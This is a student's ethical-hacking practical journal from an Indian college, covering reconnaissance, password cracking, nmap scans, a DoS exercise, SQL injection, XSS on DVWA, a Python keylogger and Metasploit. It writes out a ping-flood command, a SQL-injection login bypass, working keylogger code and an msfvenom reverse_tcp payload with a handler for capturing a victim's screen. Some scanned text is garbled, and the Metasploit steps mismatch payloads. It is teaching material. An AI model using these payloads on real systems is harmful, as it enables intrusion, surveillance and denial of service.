Semester VI Subject Name: Ethical Hacking Name: Mohammed Raza Haqiqullah Khan Class: T.Y. B.Sc. Computer Science

Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1of 35

B.K.

BIRLA COLLEGE OF
ARTS, SCIENCE & COMMERCE, KALYAN
(Department of Computer Science)

Semester VIth

Subject Name: Ethical Hacking

Name: Mohammed Raza Haqiqullah Khan

Class: T.Y. B.Sc. Computer Science

Roll No.: 336

Exam Seat No.:


B.K. BIRLA COLLEGE OF
ARTS, SCIENCE & COMMERCE, KALYAN
(Department of Computer Science)

CERTIFICATE

This is to certify that Mr./Miss: Mohammed Raza Haqiqullah khan

Roll No. 336 Exam Seat No. has

satisfactorily Completed the practical in

Ethical Hacking as laid down in

the regulation of university of Mumbai for the

purpose of Semester VI Examination 2021-2022.

Date:

Place: Head
Department of Computer Science

Signature of Examiners
Professor
In-Charge Computer Science
INDEX

Sr. No Particulars Date


1. Use Google and Whois for Reconnaissance March 05
2022
2. a) Use CrypTool to encrypt and decrypt passwords using RC4 March 05
algorithm 2022
b) Use Cain and Abel for cracking Windows account
password using Dictionary attack and to decode wireless
network
passwords
3. a) Run and analyze the output of following commands in Linux March 05
– ifconfig, ping, netstat, traceroute 2022
b) Perform ARP Poisoning in Windows
4. Use NMap scanner to perform port scanning of various forms
– March 07
ACK, SYN, FIN, NULL, XMAS 2022
5. a) Use Wireshark (Sniffer) to capture network trafficand March 07
analyze 2022
b) Use Nemesy to launch DoS attack
6. Simulate persistent cross-site scripting attack March 09
2022
7. Session impersonation using Firefox and Tamper Data add-on March 09
2022
8. Perform SQL injection attack March 05
2022
9. Create a simple keylogger using python March 11
2022
10. Using Metasploit to exploit (Kali Linux) March 11
2022
Practical No.: 01 Roll No.: 336
Topic: Use Google and Whois for Reconnaissance

Aim: Use Google and Whois for Reconnaissance


Background Info: Whois is a widely used Internet record listing that identifies who owns a domain and
how to get in contact with them. The Internet Corporation for Assigned Names and Numbers (ICANN)
regulates domain name registration and ownership.

Steps:

Step 1: Open the WHO.is website

Step 2: Enter the website name and hit the “Enter button”.

Output:
google.com
WflOIS forMa•

Dmgnos s
- DNS Records

cache expires in 6 hours, d1 minutes and 2 seconds


0 refresh

Registrar Info
Name
Marl<Moni or. I c.
Whois Server
whois markmo tor.CXlffi
Re'e rral UR
h ttp:/1www.markmon1t or com
status
d ie tDele eProhilllted {https:l •m ica rv1 org!epp#ch
d ie tTrans erPro bit (https:/ w,w. can .orgf . d ie tTrans erPro bit
d ie tUpdateProh ibi ed (https:/ 11'M11.1cann.orgtepp;; ientUpdateProhibi
ed) serverDeleteProhIbi ed (h ps:/ '/\WI ie.1r1n o rglep :serverDele
eProhiblted)

(https://w1•m Ican org/epp;tserverTrans'erProhibi ed)


)
serverU eProh1 ed ( h ttps:/,wv,w. an .org/epp#serv Upda eProhilll ted

Important Dates
Expires On 2028-09-13

Registere<J 01 1997-09-15

U pdated 01 2019-09-09

Name Servers
rs1.google com 2 62393210

rs2 .google com 262393410

r.s3 google com 2 62393610

rs4 google com 2 62393810

Similar Domains
googl0 ac:3° oa8 com I go ogt0 oe4°o95 com I googl0 oe2'!o84° a85c3'!oa8.CXlrTl I googl0 ae2'!o84°a85c3° ceF.cb"' abd.com I
googl---e com I googl- e com I googl-.com I googl - com I googl-2 com I googl-accts com I googl-ak com l googl-
al 1c.com I googl-analis c net I googf -anahst 1c .ru I googl-anahst 1c ua I googl-anal sys.CXlffi I googl-an ytics com I googl-
and Old ru I googl-apps-do ud I fo I googl-apps com I
Practical No.: 02 Roll No.: 336

Topic: a) Use CrypTool to encrypt and decrypt passwords using RC4 algorithm

b) Use Cain and Abel for cracking Windows account password using Dictionary attack and to
decode wireless network passwords

2. a)
Aim: a) Use CrypTool to encrypt and decrypt passwords using RC4 algorithm
Background Info: Cryptool is an open-source and freeware program that can be used in
various aspects of cryptographic and cryptanalytic concepts. There are no other programs
like it available over the internet where you can analyze the encryption and decryption of
various algorithms

Steps:

Step 1: Open your installed CrypTool Software >> Create new file >> Enter some text in
it
E.g.” Hello World!”.
Step 2: Click Encrypt/Decrypt Tab Step 3: Encryption using RC4

>> Select Symmetric (Modern) >> Using RC4

Output:

 Encrypted Text
 Decrypted text using RC4

2. b)

Aim b) Use Cain and Abel for cracking Windows account password using Dictionary attack and
to decode wireless network passwords

Background Info: Cain and Abel (often abbreviated to Cain) was a password recovery tool for Microsoft
Windows. It could recover many kinds of passwords using methods such as network packet sniffing,
cracking various password hashes by using methods such as dictionary attacks, brute force and
cryptanalysis attacks.

Steps:

Step 1: Click on HASH calculator


Step 2: Enter the password to convert into hash Paste the value into the field you have
converted e.g. (MD5)

Step 3: Then right click on the file and select (Add to List) and then select the Wordlist.
Step 4: Select all the options and start the dictionary attack
Practical No.: 03 Roll No.: 336
Topic: a) Run and analyze the output of following commands in Linux – ifconfig, ping, netstat,
traceroute

b) Perform ARP Poisoning in Windows

3. a)
Aim: a) Run and analyze the output of following commands in Linux – ifconfig, ping, netstat, traceroute
Steps:

Step 1: run
ipconfig/ifconfig
Ipconfig/Ifconfig
Ipconfig is a DOS utility that can be used from MS-DOS and the Windows command line to
display the network settings currently assigned and given by a network. This command can be
utilized to verify a network connection as well as to verify your network settings.
Syntax
ipconfig [/all compartments] [/? | /all | /renew [adapter] | /release [adapter] | /renew6 [adapter] |
/release6 Rizvi College of Arts, Science and Commerce, Bandra TYB.SC CS 6th Sem Ethical
Hacking Dr. Ruchi Gupta [adapter] | /flushdns | /displaydns | /registerdns | /showclassid adapter |
/setclassid adapter [classid] | /showclassid6 adapter | /setclassid6 adapter [classid] ]

Step 2: Ping all the IP addresses

Ping:- The ping command is a Command Prompt command used to test the ability of the source
computer to reach a specified destination computer. The ping command is usually used as a simple way
to verify that a computer can communicate over theor network device.Syntax
Ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS] [-r count] [-s count] [-w timeout] [-R] [- S srcaddr] [-
p] [-4] [-6] target [/?]

Step 3: run Netstat

The netstat command, meaning network statistics, is a Command Prompt command used to display
very detailed information about how your computer is communicating with other computers or
network devices. Specifically, the netstat command can show details about individual network Rizvi
College of Arts, Science and Commerce, Bandra TYB.SC CS 6th Sem Ethical Hacking Dr. Ruchi Gupta
connections, overall and protocol-specific networking statistics, and much more, all of which could help
troubleshoot certain kinds of networking issues.

Syntax

netstat [-a] [-b] [-e] [-f] [-n] [-o] [-p protocol] [-r] [-s] [-t] [-x] [-y] [time_interval] [/?]

Step 4: Type tracert command and type www.google.com press “Enter”.


Tracert:- The tracert command is a Command Prompt command that's used to show several details
about the path that a packet takes from the computer or device you're on to whatever destination you
specify.

Syntax

Tracert [-d] [-h MaxHops] [-w TimeOut] [-4] [-6] target [/?]

Traceroute

Traceroute is a command which can show you the path a packet of information takes from your
computer to one you specify. It will list all the routers it passes through until it reaches its destination,
or fails to and is discarded. In addition to this, it will tell you how long each 'hop' from router to router
takes.
3.b)
Aim: b) Perform ARP Poisoning in Windows
Background Info: ARP stand as Address Resolution Protocol. ARP Poisoning is a type of cyberattack
that abuses weaknesses in the widely used Address Resolution Protocol (ARP) to disrupt, redirect, or
spy on network traffic. In this piece.

Steps:

Step 1: Open CMD Run as


administrator Run: arp -a
 apr calls the ARP configure program located in Windows/System32 directory
 -a is the parameter to display to contents of the ARP cache

Step 2: Run: ipconfig/all


 Open the command prompt then use the ipconfig /all command to get the IP and MAC address.
Step 3: Run: arp -a ip_address mac_address

 The MAC address is represented using the Physical Address and the IP address is IPv4Address.
Step 4: Run: arp -d
 It is used to remove an entry.
Practical No.: 04 Roll No.: 336
Topic: Use NMap scanner to perform port scanning of various forms – ACK, SYN, FIN, NULL, XMAs

Aim: Use NMap scanner to perform port scanning of various forms – ACK, SYN, FIN, NULL, XMAS
Background Info: Nmap is a network scanner created by Gordon Lyon. Nmap is used to discover
hosts and services on a computer network by sending packets and analyzing the responses. Nmap
provides a number of features for probing computer networks, including host discovery and service
and operating system detection.

Steps:

NOTE: Install Nmap for windows and install it. After that open cmd and type “nmap” to check if it is
installed properly. Now type the below commands.

#nmap ip address

ACK -sA (TCP ACK scan)


It never determines open (or even open|filtered) ports. It is used to map out firewall rulesets,
determining whether they are stateful or not and which ports are filtered.
Command: nmap -sA -T4 scanme.nmap.org
 SYN (Stealth) Scan (-sS)
SYN scan is the default and most popular scan option for good reason. It can be performed
quickly, scanning thousands of ports per second on a fast network not hampered by intrusive
firewalls.
Command: nmap -p22,113,139 scanme.nmap.org

 FIN Scan (-sF)


Sets just the TCP FIN bit.
Command: nmap -sF -T4
para

 NULL Scan (-sN)


Does not set any bits (TCP flag header is 0)
Command: nmap –sN –p 22
scanme.nmap.org
 XMAS Scan (-sX)
Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.
Command: nmap -sX -T4 scanme.nmap.org
Practical No.: 05 Roll No.: 336
Topic: a) Use Wireshark (Sniffer) to capture network traffic and analyze

b) Use Nemesy to launch DoS attack

Aim: a) Use Wireshark (Sniffer) to capture network traffic and analyze


Background Info: Wireshark is a free and open-source packet analyzer. It is used for network
troubleshooting, analysis, software and communications protocol development, and education.
Originally named Ethereal, the project was renamed Wireshark in May 2006 due to trademark
issues.

Steps:

Step 1: Install and open WireShark.

Step 2: Click on ethernet or Wi-Fi option.

Step 3: Open CMD and run: ping www.google.com


Step 4: Find ICMP protocol in wireshark window.

Aim: b) Use Nemesy to launch DoS attack


Steps:

 Ping of Death
We will assume you are using Windows for this exercise. We will also assume that
you have at least two computers that are on the same network. DOS attacks are
illegal on networks that you are not authorized to do so. This is why you will need
to setup your own network for this exercise.

 Open the command prompt on the target computer


 Enter the command ipconfig. You will get results similar to the ones shown below
For this example, we are using Mobile Broadband connection details. Take note of the IP address.
Note: for this example to be more effective, and you must use a LAN network.

 Switch to the computer that you want to use for the attack and open the command prompt.
 We will ping our victim computer with infinite data packets of 65500.
 Enter the following command
ping 10.128.131.108 –t |65500

HERE,
 “ping” sends the data packets to the victim
 “10.128.131.108” is the IP address of the victim
 “-t” means the data packets should be sent until the program is stopped
 “-l” specifies the data load to be sent to the
victim You will get results similar to the ones shown
below

Flooding the target computer with data packets doesn’t have much effect on the victim. In order for
the attack to be more effective, you should attack the target computer with pings from more than one
computer.

The above attack can be used to attacker routers, web servers etc.

If you want to see the effects of the attack on the target computer, you can open the task manager
and view the network activities.

 Right click on the taskbar


 Select start task manager
 Click on the network tab
 You will get results similar to the following
If the attack is successful, you should be able to see increased network activities.

 Hacking Activity: Launch a DOS attack

In this practical scenario, we are going to use Nemesy to generate data packets
and flood the target computer, router or server. As stated above, Nemesy will
be detected as an illegal program by your anti-virus. You will have to
disabletheanti- virus for this exercise.

 Download Nemesy from http://packetstormsecurity.com/files/25599/nemesy13.zip.html


 Unzip it and run the program Nemesy.exe
 You will get the following interface

Enter the target IP address, in this example; we have used the target IP we used in the above
example.
HERE,

 0 as the number of packets means infinity. You can set it to the desired number if you do
not want to send, infinity data packets
 The size field specifies the data bytes to be sent and the delay specifies the
time interval in milliseconds.
Click on send button
You should be able to see the following results

The title bar will show you the number of packets sent
Click on halt button to stop the program from sending data packets.
Practical No.: 06 Roll No.: 336
Topic: Simulate persistent cross-site scripting attack

Aim: Simulate persistent cross-site scripting attack


Steps:

Step 1: Open XAMPP and start apache and mysql

Step 2: Go to Localhost: 8080/setup.php and login using username: admin; password:


password.

Step 3: Opens the home page.


Step 4: Once logged in we want to navigate to the DVWA Security tab, select “Low” in
the drop-down box, and hit Submit.
STEP 5: STORED CROSS SITE SCRIPTING

Step 6: Reflected Cross Site Scripting


- ..- X X +
X © IQCal

e cl Croe Site SerlpUng (XSS)

°""'"""' ' ,._,

I IMI

l#lHCUr-•C"APll:" Mo
1141,nrr.ur.i1,
IOI kl .. !!U!lil'ifllllilffCO

lil'M•.. ··••14111 •
JUI t 11KO
i,,1 1

...,,,..
l':I lll f lH ".fllOfU

... u..,..........tue
nru.. rac
Cent.nan.I lnpi llatll
C.l[R,

F lm:h1a.lo11
Filal,J-
Nt..1111I C rAP TC HA
QI lliiM •lii• ■I
QI tO ,tM Jl■rn 4Phtltl.
'1¥91111 ·• ■M ..I l fle
Practical No.: 08 Roll No.: 336
Topic: Perform SQL injection attack.

Aim: Perform SQL injection attack.


Steps:

Step 1: Open any browser >> Search https://www.hacksplaining.com/exercises/sql-injection >>

Click on Sql injection.

Step 2: Try to enter email: user@email.com and password: password


Step 3: Again, try to enter email: user@email.com and password: password’, the output will
show you an error.

Step 4: Now we will use this error for our advantage. Try to enter email: user@email.com and
password: password’ or 1=1--
Step 5: Hit Enter. Now you will get the entry in the respective bank account without correct
Password.
Practical No.: 09 Roll No.: 336
Topic: Create a simple keylogger using python

Aim: Create a simple keylogger using python.


Steps:

Step 1: Run the following code in Python interpreter.

Code:

# Install pynput with the command:


# pip install pynput
# run the above command in cmd
import pynput
from pynput.keyboard import Key, Listener
import logging
# Empty string means the output will be stored in the current
directory
log_dir = ""
# This is a basic logging function
logging.basicConfig(filename=(log_dir+"key_log.txt"),level=logging.
DEBUG,
format='%(asctime)s:%(message)s:')
# This is from the library
def on_press(key):
logging.info(str(key))
# This says, listener is on
with Listener(on_press=on_press) as listener:
listener.join()

Step 2: Open notepad and type something, as you type something you will see that one
key_log.txt file will get created, which will have all the pressed keystrokes records.
Practical No.: 10 Roll No.: 336
Topic: Using Metasploit to exploit (Kali Linux).

Aim: Using Metasploit to exploit (Kali Linux).


Steps:

Step 1:
 We will download Virtual box and install it.
 Download and install Kali distribution.
 Download and install Metasploitable which will be our hacking machine.
 Download and install Windows XP which will be another hacking machine.

Step 2:
 First of all, open the Metasploit console in Kali.
 You can do so by following the path: Applications → Exploitation Tools → Metasploit.

 Once you open the Metasploit console, you will get to see the following screen.
Highlighted in red underline is the version of Metasploit.

Step 3: use following command to install Metasploit-framework. After running this command,
you will have to wait several minutes until the update completes.

apt install metasploit-framework


apt update

Step 4: First we Create payload using command line in Kali Linux

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.159


lport=4444 -f exe -

a x86 > Hack.exe

After successfully creating payload Hack.exe, copy that payload in to the victim’s PC (Windows).
Step 5: Exploit using Command Prompt

 Now we will use an exploit that can work for us. Open metasploit and set handler:

Using following command

root@kali:~# msfconsole

Step 6: After that run this command to set Local

host msf5>use exploit/multi/handler

msf5 exploit(multi/handler)>set payload android/meterpreter/reverse_tcp

msf5 exploit(multi/handler)>>set lhost 192.168.43.159

msf5 exploit(multi/handler)>>set lport 4444


Step 7: After that run these command to set Remote host

msf5>use exploit/multi/handler

msf5 exploit(multi/handler)>set payload android/meterpreter/reverse_tcp

msf5 exploit(multi/handler)>>set rhost 192.168.43.99

msf5 exploit(multi/handler)>>set rport 80

msf5 exploit(multi/handler)>>show options

Step 8: after successful exploit


Step 9: capture the session on remote host type the command screenshot its capture the
victim Pc screenshot and save in root directory.

Capture output

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy